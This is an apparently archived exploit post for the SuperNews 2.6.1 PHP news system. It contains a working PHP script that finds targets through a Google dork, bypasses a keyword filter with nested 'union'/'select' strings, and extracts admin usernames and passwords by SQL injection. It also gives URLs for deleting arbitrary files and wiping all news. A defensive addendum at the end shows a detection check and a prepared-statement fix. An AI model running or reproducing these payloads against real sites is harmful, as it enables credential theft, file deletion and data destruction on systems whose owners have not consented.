Supernews 2.6.1 SQL Injection Vulnerability


[php]
<?php
# Exploit Title: Supernews <= 2.6.1 SQL Injection Vulnerability
# Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
# Version: 2.6.1
# Tested on: Debian GNU/Linux

/*
Exploit for educational purpose only.
Note sent to the developer Fernando Pontes by e-mail 90@08sec.com

SuperNews is a Brazilian news system in PHP and MySQL.
Versions prior to 2.6 have a simple SQL Injection on view news.
The developer tried to fix the bug by removing keywords like "union" and "select".
But by nesting a keyword inside itself it is possible to bypass these filters. See:
seselectlect
After the "select" word is removed, another "select" word remains. See more:
seSELECTlect

Another SQL Injection on the administration panel:
When deleting a post, you can inject SQL to delete all news in the database.

Another vulnerability allows deleting files from the administration panel:
When deleting a post, a variable called "unlink" tells the system which news image to delete.
But it is possible to delete other files by typing the full file path or using "../".

Usage:
php exploit.php http://www.unhonker.com/supernews/

For more info about vulnerabilities:
php exploit.php moreinfo

Example:
$ php exploit.php http://www.unhonker.com/news/

Supernews <= 2.6.1 SQL Injection Exploit

[*] Trying to access server...
[*] Detecting version... :-o
[!] Version: >2.6.1 :-)
[!] Administration panel: http://www.unhonker.com/news/admin/adm_noticias.php
Type "exploit.php moreinfo" to get other vulnerabilities.
[*] Getting user & pass 8-]
User: user1
Pass: pass1

User: user2
Pass: pass2

Good luck! :-D

*/

error_reporting(E_ERROR);
set_time_limit(0);
@ini_set("default_socket_timeout", 30);

// Turn a string into a MySQL hex literal (0x...), so the marker token can be
// placed in the injected SELECT without using quotes.
function hex($string) {
    $hex = ''; // PHP 'Dim' =]
    for ($i = 0; $i < strlen($string); $i++) {
        $hex .= dechex(ord($string[$i]));
    }
    return '0x' . $hex;
}

// Helper kept from the original: replaces every other occurrence of $needle.
// Not used by the exploit flow below.
function str_replace_every_other($needle, $replace, $haystack, $count = null, $replace_first = true) {
    $count = 0;
    $offset = strpos($haystack, $needle);
    // If we don't replace the first, go ahead and skip it
    if (!$replace_first) {
        $offset += strlen($needle);
        $offset = strpos($haystack, $needle, $offset);
    }
    while ($offset !== false) {
        $haystack = substr_replace($haystack, $replace, $offset, strlen($needle));
        $count++;
        $offset += strlen($replace);
        $offset = strpos($haystack, $needle, $offset);
        if ($offset !== false) {
            $offset += strlen($needle);
            $offset = strpos($haystack, $needle, $offset);
        }
    }
    return $haystack;
}

// Unused helper kept from the original.
function removeaddregex($str) {
    return str_replace_every_other('(.*)', '', $str, null, false);
}

// Unused helper kept from the original (a hand-rolled preg_quote).
function preg_quote_working($str) {
    $chars = explode(" ", "\ . + * ? [ ^ ] $ ( ) { } = ! < > | :");
    foreach ($chars as $char) {
        $str = str_replace($char, "\\" . $char, $str);
    }
    return $str;
}

echo "\nSupernews <= 2.6.1 SQL Injection Exploit";
echo "\nCoded by 08sec - www.08sec.com\nUse at your own risk.\n\n";

if ($argc != 2) {
    echo "Usage:
php $argv[0] url
Example:
php $argv[0] http://www.unhonker.com/supernews
php $argv[0] https://www.unhonker.com/supernews/";
    exit;
}

if ($argv[1] == "moreinfo") {
    echo "\nMore vulnerabilities:
- Deleting files
  You can delete files on the server, after login, using the URL:
  http://server.com/admin/adm_noticias.php?deleta=ID&unlink=FILE
  Replace \"ID\" with a valid post ID (will be deleted) and FILE with the file address on the server.

- Deleting all news in the database:
  You can delete all news in the database with only one request. Look:
  http://server.com/admin/adm_noticias.php?deleta=0%20or%201=1--+

All vulnerabilities discovered by WCGroup.\n";
    exit;
}

$uri = $argv[1];
if (substr($uri, -1, 1) != "/") {
    $uri .= "/";
}

// The vulnerable parameter is "noticia"; the view-news script is either
// noticias.php or index.php depending on the install.
$url = $uri . "noticias.php?noticia=" . urlencode("-1") . "+";
echo "\n[*] Trying to access server...";
$accessvr = @file_get_contents($url);
if (($accessvr == false) OR (preg_match("/(404|mysql_query)/", $accessvr))) {
    $url = $uri . "index.php?noticia=" . urlencode("-1") . "+";
}

// Random marker echoed back by the injected SELECT, so the response can be
// checked for the injection having run.
$token = substr(md5(chr(rand(48, 122))), 0, 10);

echo "\n[*] Detecting version... :-o";

// Versions without the keyword filter accept a plain UNION SELECT; 2.6.1
// strips "union"/"select" once, so the nested form survives the filter.
$gettoken = strip_tags(file_get_contents($url . urlencode("union all select 1,2,3,4," . hex($token) . ",6,7-- ")));
if (preg_match("/" . $token . "/", $gettoken)) {
    echo "\n[!] Version: >2.6.1 :-)";
    $version = 1;
} else {
    $gettoken = strip_tags(file_get_contents($url . urlencode("uniunionon seleselectct 1,2,3,4,5," . hex($token) . ",7,8-- ")));
    if (preg_match("/" . $token . "/", $gettoken)) {
        echo "\n[!] Version =2.6.1 :-)";
        $version = 2;
    } else {
        echo "\n[-] Unknown version :-S";
        $version = 3;
    }
}

if ($version != 3) {
    echo "\n[!] Administration panel: {$uri}admin/adm_noticias.php";
    echo "\n Type \"$argv[0] moreinfo\" to get other vulnerabilities.";
    echo "\n[*] Getting user & pass 8-]";
}

if ($version == 1) {
    $i = 0;
    while (true) {
        $request = strip_tags(file_get_contents($url . urlencode("union all select 1,2,3,4,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),6,7 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if (!empty($get[1][0])) {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: $user\nPass: $pass\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} elseif ($version == 2) {
    $i = 0;
    while (true) {
        $request = strip_tags(file_get_contents($url . urlencode("uniunionon seleselectct 1,2,3,4,5,concat(" . hex($token) . ",user," . hex($token) . ",pass," . hex($token) . "),7,8 from supernews_login limit $i,1-- ")));
        preg_match_all("/$token(.*)$token(.*)$token/", $request, $get);
        if (!empty($get[1][0])) {
            $user = $get[1][0];
            $pass = $get[2][0];
            echo "\nUser: $user\nPass: $pass\n";
            $i++;
        } else {
            echo "\nGood luck! :-D";
            break;
        }
    }
} else {
    echo "\n\nThis site is using an unknown version of Supernews or another CMS.";
    echo "\nPlease note that only versions <= 2.6.1 of Supernews are vulnerable.";
    echo "\nWebservers with modules or firewalls like \"mod_security\" aren't vulnerable.";
    echo "\nIf you want, try to access manually:";
    echo "\nThe vulnerability is in the view-news file (index.php or noticia.php), in the variable \"noticia\", a simple SQL Injection.";
    echo "\nWe're sorry.";
}

echo "\n";
[/php]
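
The advisory's core point is that removing "union"/"select" once does not stop a keyword nested inside itself. The following is an added example, not code from SuperNews or from the exploit above: a filter in the spirit of the 2.6.1 fix, a check that flags the nested pattern, and the allow-list plus prepared-statement version that the view-news page should use instead. The table and column names (noticias, id, titulo, texto) are assumed placeholders, not SuperNews's real schema.

```php
<?php
// Added example, not part of SuperNews or the exploit. Table/column names are
// assumed placeholders, not the real schema.

// Weak: one pass of blacklist removal, as the 2.6.1 fix attempted.
// A keyword nested inside itself ("uniunionon") is reassembled by the removal.
function weak_filter(string $input): string {
    return str_ireplace(['union', 'select'], '', $input);
}

// Detection heuristic for logs or a WAF rule: if one pass changes the input
// and the result still contains a blacklisted word, the request was built to
// outlive the filter. Worth alerting on even if the query is already safe.
function looks_like_nested_bypass(string $input): bool {
    $once = weak_filter($input);
    return $once !== $input && $once !== weak_filter($once);
}

// Correct: "noticia" is a row id, so accept only a positive integer.
// Anything else is rejected before it can reach query text.
function news_id_or_null(string $raw): ?int {
    return preg_match('/^[1-9][0-9]{0,9}$/', $raw) ? (int) $raw : null;
}

// The id is bound as a typed parameter; no string concatenation into SQL.
function load_news(PDO $db, string $raw): ?array {
    $id = news_id_or_null($raw);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, titulo, texto FROM noticias WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Self-check with the nested payload shape the advisory describes (constructed input).
$payload = '-1 uniunionon seleselectct 1,2,3';
assert(weak_filter($payload) === '-1 union select 1,2,3');   // filter rebuilt the keywords
assert(looks_like_nested_bypass($payload) === true);          // and the pattern is detectable
assert(news_id_or_null($payload) === null);                   // allow-list rejects it outright
assert(news_id_or_null('42') === 42);                         // legitimate id still works
echo "ok\n";
```

Iterating the blacklist to a fixed point would catch this particular payload but is still a blacklist; the allow-list and bound parameter are what remove the injection.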
